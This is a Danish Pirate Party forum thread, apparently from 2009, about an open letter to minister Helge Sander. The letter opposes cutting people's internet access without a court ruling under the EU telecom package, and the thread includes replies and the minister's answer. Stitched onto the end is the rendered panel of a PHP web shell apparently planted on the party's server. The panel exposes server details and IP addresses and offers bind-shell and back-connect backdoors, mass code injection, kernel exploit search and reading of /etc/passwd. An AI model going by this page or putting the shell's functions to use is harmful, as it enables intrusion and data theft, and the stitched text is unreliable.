You are here

Åbent brev til Helge Sander

6 posts / 0 new
Last post
Ole Husgaard
Åbent brev til Helge Sander

Jeg har i dag sendt nedenstående åbne brev til Helge Sander:

Kære Helge Sander,

Vil du afskaffe retssamfundet?

I Europa er vi stolte over vores retssamfund. Retssikkerheden er en vigtig del af fundamentet for vores demokrati. "Med lov skal man land bygge" lyder det i indledningen til Jyske lov. Det vigtigste princip i retssamfundet er, at man ikke straffer folk uden dom.

Men desværre er ikke alle interesserede i retssikkerhed. Rettighedshavere i en række europæiske lande synes det er for besværligt at skulle bevise påståede krænkelser af deres rettigheder ved en domstol, og har derfor presset på for at gøre det muligt at straffe folk for påståede lovbrud uden beviser eller dom. I Frankrig er det for nyligt lykkedes for dem at få gennemført en lov, som gør det muligt at straffe folk uden dom. Loven siger, at man - efter tre gange at være beskyldt for at kopiere ulovligt - kan straffes ved at blive nægtet internetadgang i op til et år. Loven kræver ingen beviser, og domstolene er ikke involveret. Heldigvis har det franske forfatningsråd i dag forkastet de dele af loven, som handler om straf uden dom.

Ønsker Ministeren, at det i EU-lande skal være tilladt at straffe folk uden dom?

Jeg har svært ved at tro det, men i Ministerens svar på Hanne Dahls brev fra den 13. maj kan man læse: "Det er dog samtidig min holdning, at der med dén aftale, der blev indgået den 29. april mellem Parlamentets ordførere, Rådet og Kommissionen, blev fundet et rimeligt kompromis i dette spørgsmål, som sikrede brugernes rettigheder i forhold til adgangen til internettet."

I det kompromisforslag, som blev aftalt den 29. april er det præcise begreb "domstol" erstattet med det uklare og ikke nærmere definerede begreb "uafhængigt og neutralt tribunal". Grunden til denne ændring til et mere uklart sprog er, at man ønsker, at det i Europa skal være tilladt at straffe folk uden beviser eller dom. Kompromisforslaget mødte så stor modstand i EU-Parlamentet, at den oprindelige tekst blev vedtaget med et overvældende flertal. EU-Parlamentet ønsker altså ikke at retssamfundet skal afskaffes i Europa.

Men hvis du støtter dette kompromisforslag i Ministerrådet, arbejder du samtidigt for at det europæiske retssamfund nedmonteres. Jeg håber, at Ministeren indser dette, og i stedet støtter den tekst, som EU-Parlamentet nu to gange med stort flertal har vedtaget.

Med Venlig Hilsen,

Ole Husgaard,
Formand for Piratpartiet i Danmark.

ChristianHH
Fuldstændig absurd, hvorfor

Fuldstændig absurd, hvorfor vil de skabe en ny domstol hvis rettighedshaverne er så bange for at få afvist deres sag ved højesteret. Det er en omgåelse af systemet og ødelægger voresretsopfattelse. Det minder om systemet som vi finder ved regeringens administrative udvisninger og er bestemt ikke noget jeg kan tilslutte mig. Brug vores retssystem, det er vores borgere som sidder ved domstolene - og de bør bestemme fortolkningen af loven. Ikke ISP'er eller copyrightsindehaver.

Ole Husgaard
Sagen behandles ikke på Ministerrådsmødet i morgen

Jeg kan tilføje, at det ser ud til, at sagen alligevel ikke bliver behandlet på mødet i morgen.

Der er blandt ministrene stor modstand mod ændringsforslaget, som kræver, at folk ikke må straffes uden dom. Men det er også politisk farligt at stemme mod et sådant ændringsforslag, både fordi det kan ses som en støtte til krænkelser af menneskerettighederne, og fordi det i yderste fald kan medføre, at hele telekom-pakken falder til jorden uden at kunne vedtages.

Derfor ser det ud til, at man i COREPER har valgt en anden strategi: Man vil i stedet komme med en juridisk redegørelse, som siger at ændringsforslaget er i strid med EU-retten. Men det tager tid at vride juraen så meget, at man kommer frem til at et ændringsforslag, som kræver at menneskerettighederne overholdes, skulle være i strid med EU-retten. Derfor når sagen ikke at blive behandlet på mødet i morgen.

Det betyder så også, at det bliver det svenske formandskab, som tiltræder den 1. juli, som kommer til at mægle i sagen mellem EU-Parlamentet og Ministerrådet. Det bliver interessant at se hvordan de vil gøre ovenpå valgsejren til Piratpartiet i Sverige i søndags.

Erik Ernst
Erik Ernst's picture
Sidder han mon på kontoret og tænker?

Jeg forestiller mig hr. Selge Hander sidder på sit kontor og funderer;

Hm, skulle man vitterlig afskaffe retssamfundet?

Ole Husgaard
Svar fra Helge Sander

Torsdag den 25/6 kl. 16:18 fik jeg, via ministersekretær Charlotte Stuhr, følgende svar fra Helge Sander:

Kære Ole Husgaard

Tak for din henvendelse af 10. juni 2009 om retssamfundet og forhandlingerne om teledirektivpakken.

Den danske regering arbejder i Ministerrådet for, at teledirektivpakken kommer til at indeholde Europa-Parlamentets ændringsforslag 138 om, at der ikke uden en forudgående domstolskendelse må foretages begrænsninger i slutbrugernes grundlæggende rettigheder.

En række medlemslande har dog meget svært ved at acceptere Europa-Parlamentets ændringsforslag i dets nuværende ordlyd. Spørgsmålet skal vedtages med kvalificeret flertal i Rådet, og Danmark har således ikke
vetoret i spørgsmålet.

Som bekendt blev der den 29. april 2009 indgået en foreløbig aftale mellem Parlamentets ordførere, Rådet og Kommissionen, som jeg mener, udgjorde et rimeligt kompromis i dette spørgsmål. Ved afstemningen den 6. maj underkendte et meget stort flertal i Europa-Parlamentet imidlertid denne aftale.

Der skal nu findes et nyt kompromis vedrørende teledirektivpakken. Den danske regering vil fortsat arbejde for, at Europa-Parlamentets ændringsforslag kommer med i teksten, men kan dette ikke lade sig gøre, vil regeringen
naturligvis medvirke til, at der kan findes et fornuftigt kompromis i dette spørgsmål.

Jeg vil gerne understrege, at regeringen, uanset udfaldet af forhandlingerne om teledirektivpakken, ikke har planer om at fratage danskere deres internetforbindelse uden en domstolskendelse. I Danmark vil lukning af en
brugers internetforbindelse i forbindelse med krænkelser af ophavsretsloven kræve en domstolskendelse af hensyn til borgernes retssikkerhed.

Jeg mener, at krænkelser af ophavsretsloven via ulovlig fildeling eller piratkopiering er et reelt problem, og regeringen vil ikke beskytte sådanne ulovlige formål. Derfor skal det naturligvis være muligt at gribe ind over
for disse ulovligheder.

Med venlig hilsen

Helge Sander

Ole Husgaard
Positivt svar

I forhold til tilsvarende henvendelser, som jeg hat set Helge Sander svare på, synes jeg dette svar er rimeligt positivt.

Han skriver direkte, at den danske regering fortsat vil arbejde for, at EU-Parlamentets ændringsforslag kommer med i teksten. Det har jeg ikke tidligere set ham melde ud, og jeg håber, at han kan fastholdes på det.

Et alvorligt problem i Ministerrådet er manglende åbenhed. Desværre er det ikke usædvanligt at politikere udadtil siger en ting, mens de internt i Ministerrådet arbejder i en helt anden retning. Det er Helge Sander heldigvis ikke slem til, og det kunne blive en alvorlig politisk bet for ham, hvis det blev afsløret at han sagde noget andet end han gjorde.

Før man skal ud i en trediebehandling, hvor man skal forsøge at finde et forlig mellem EU-Parlamentet og Ministerrådet, skal Ministerrådet først afslutte sin andenbehandling. Den begyndte først i torsdags, hvor de fik telekom-pakken fra EU-Parlamentet. Ved Ministerrådets andenbehandling, kan de vedtage EU-Parlamentets tekst med kvalificeret flertal, og Frankrig har ikke vetoret. Vedtages teksten, er telekom-pakken gennemført uden yderligere forsinkelser.

Så det er stadig her vi skal lægge presset. På landenes ministre, så de vedtager EU-Parlamentets tekst. Vi bør også lægge pres på, så afgørelsen i Ministerrådet ikke sker som et A-punkt uden offentlig drøftelse eller afstemning (ikke usandsynligt), man som et B-punkt, hvor offentligheden kan se hvordan hver enkelt minister har stemt.

For vedtages EU-Parlamentets tekst ikke, tyder meget på, at telekom-pakken falder til jorden ved trediebehandlingen, medmindre Ministerrådet under forligsprocessen kan overtales til at acceptere EU-Parlamentets tekst. Det er kun sket to gange tidligere i EUs historie.

Udmeldingerne fra EU-Parlamentet har været markante: Man skal ikke kunne straffe folk uden dom. Og nu har vi Christian Engström i EU-Parlamentet, sammen med en række andre pirater, som ser dette som deres vigtigste aktuelle mærkesag. Og de er langtfra alene. En lang række borgerrettighedsorganisationer er blevet opmærksomme på denne sag, og allerede gået i gang med at påvirke EU-Parlamentet til ikke at acceptere at retssikkerheden afskaffes.

GNY.Shel! Encoded v1.1 edited B.Y $c0rPi0n
 _____ _  ___   __ _____ _     _ _ 
 / ____| \ | \ \  / // ____| |    | | |
| | __| \| |\ \_/ /| (___ | |__  ___| | |
| | |_ | . ` | \  / \___ \| '_ \ / _ \ | |
| |__| | |\ | | | _ ____) | | | | __/ | |
             \_____|_| \_| |_|(_)_____/|_| |_|\___|_|_| {V1.1 edited by $c0rPi0n}
Apache/2.2.15 (CentOS). PHP/5.3.3
Kernel: Linux pet.piratpartiet.dk 2.6.32-504.23.4.el6.x86_64 #1 SMP Tue Jun 9 20:57:37 UTC 2015
x86_64
Safe-Mode: OFF (not secure)
uid=48(apache) gid=48(apache) groups=48(apache) Disabled PHP Functions: NONE
cURL: ON
Free 836.57 GB of 912.5 GB (91.68%)Server IP: 95.211.216.69 - Your IP: 54.167.2.200

/var/www/html/piratpartietdk/   drwxr-xr-x
[Home]    [Back]    [Forward]    [Up]    [Refresh]    [Search]    [Buffer]    

[String/Hash Tools]    [Processes]    [Users]    [System Information]    [SQL Manager]    [Reverse IP]    [Kernel Exploit Search]    [Execute PHP Code]    [PHP Info]
    
[PHP Tools]    [Bind Shell Backdoor]    [Back-Connection]    [Mass Code Injection]    [Exploits]    [cPanel Finder]    [RFI/LFI Finder]    [Install IP:Port Proxy]    [Install PHP Proxy]    [Suicide Script]
    
Listing folder (20 files and 9 folders):

Name [asc] Size Modify Owner/Group Perms Action
. LINK 26.09.2015 01:02:14 0/0 drwxr-xr-x [info] 
.. LINK 25.09.2015 23:34:19 0/0 drwxr-xr-x [info] 
[profiles] DIR 25.09.2015 23:37:34 0/0 drwxr-xr-x [info] 
[includes] DIR 25.09.2015 23:35:10 0/0 drwxr-xr-x [info] 
[modules] DIR 25.09.2015 23:37:08 0/0 drwxr-xr-x [info] 
[themes] DIR 25.09.2015 23:56:20 0/0 drwxr-xr-x [info] 
[misc] DIR 25.09.2015 23:35:24 0/0 drwxr-xr-x [info] 
[public_html] DIR 25.09.2015 23:37:35 0/0 drwxr-xr-x [info] 
[sites] DIR 25.09.2015 23:50:09 0/0 drwxr-xr-x [info] 
[partier_paa_sociale_medier] DIR 25.09.2015 23:37:32 0/0 drwxr-xr-x [info] 
[scripts] DIR 25.09.2015 23:37:36 0/0 drwxr-xr-x [info] 
 web.config 2 KB 25.09.2015 23:56:24 0/0 -rw-r--r-- [info] [change] [download] 
 robots.txt 1.52 KB 25.09.2015 23:37:35 0/0 -rw-r--r-- [info] [change] [download] 
 COPYRIGHT.txt 1.45 KB 25.09.2015 23:34:54 0/0 -rw-r--r-- [info] [change] [download] 
 syslog 696 B 25.09.2015 23:56:12 0/0 -rw-r--r-- [info] [change] [download] 
 CHANGELOG.txt 73.16 KB 25.09.2015 23:34:54 0/0 -rw-r--r-- [info] [change] [download] 
 README.txt 5.25 KB 25.09.2015 23:37:35 0/0 -rw-r--r-- [info] [change] [download] 
 authorize.php 6.4 KB 25.09.2015 23:34:53 0/0 -rw-r--r-- [info] [change] [download] 
 update.php 18.96 KB 25.09.2015 23:56:23 0/0 -rw-r--r-- [info] [change] [download] 
 .htaccess 5.05 KB 26.09.2015 01:02:14 0/0 -rw-r--r-- [info] [change] [download] 
 cron.php 720 B 25.09.2015 23:34:54 0/0 -rw-r--r-- [info] [change] [download] 
 MAINTAINERS.txt 8 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 index.php 529 B 25.09.2015 23:35:10 0/0 -rw-r--r-- [info] [change] [download] 
 xmlrpc.php 417 B 25.09.2015 23:56:24 0/0 -rw-r--r-- [info] [change] [download] 
 INSTALL.mysql.txt 1.42 KB 25.09.2015 23:35:10 0/0 -rw-r--r-- [info] [change] [download] 
 INSTALL.pgsql.txt 1.83 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 LICENSE.txt 17.67 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 install.php 688 B 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 INSTALL.sqlite.txt 1.27 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 
 UPGRADE.txt 9.42 KB 25.09.2015 23:56:24 0/0 -rw-r--r-- [info] [change] [download] 
 INSTALL.txt 17.44 KB 25.09.2015 23:35:11 0/0 -rw-r--r-- [info] [change] [download] 

  


Enter:
 
Kernel Info:

Functions
Make Dir
Go Dir


 


[ Read-Only ]


 
Aliases
Make File
Go File


 


[ Read-Only ]


 

PHP Safe-Mode Bypass (Read File)

File:

e.g.: /etc/passwd or C:\WINDOWS\system32\.SAM
PHP Safe-Mode Bypass (Directory Listing)

Dir:

e.g.: /etc/ or C:\

Search
  - regexp 

Upload
 
[ Read-Only ]

.:[ GNY.Shell Encoded v1.1 ! Stand@rd Edition | Generated in: 0.0103 ]:.